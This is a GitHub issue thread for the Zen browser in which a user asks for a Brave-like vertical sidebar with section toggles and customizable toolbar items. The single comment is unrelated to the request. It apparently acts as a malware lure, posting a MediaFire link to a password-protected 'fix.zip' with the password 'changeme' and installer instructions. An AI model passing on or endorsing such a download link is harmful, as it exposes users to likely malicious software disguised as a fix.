### ISSUE TITLE
[FR] Vertical toolbar (Brave sidebar alike)

### ISSUE THREAD

**Issue by frandmb** [zen-browser/desktop#723]
### What feature would you like to see?

Brave browser [features a sidebar](https://support.brave.com/hc/en-us/articles/5181998802061-How-do-I-use-Brave-Sidebar) that's placed at the opposite side of the vertical tabs (although it can be configured to be next to them, on the same side).

It could hold:
- Clickable Toggles for Firefox/Zen sidebar sections, which could, in the future, include the upcoming [AI Services](https://blog.mozilla.org/en/products/firefox/firefox-news/ai-services-on-firefox/)
![image](https://github.com/user-attachments/assets/25349ee7-702b-4c7e-98f7-fce11fb15645)
- Docking space for toolbar's items that can be manipulated through the "Customize toolbar" view. Including shortcuts for navigation, extensions, devtools and screenshots.
- ???

**Comment by Mlecherf** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
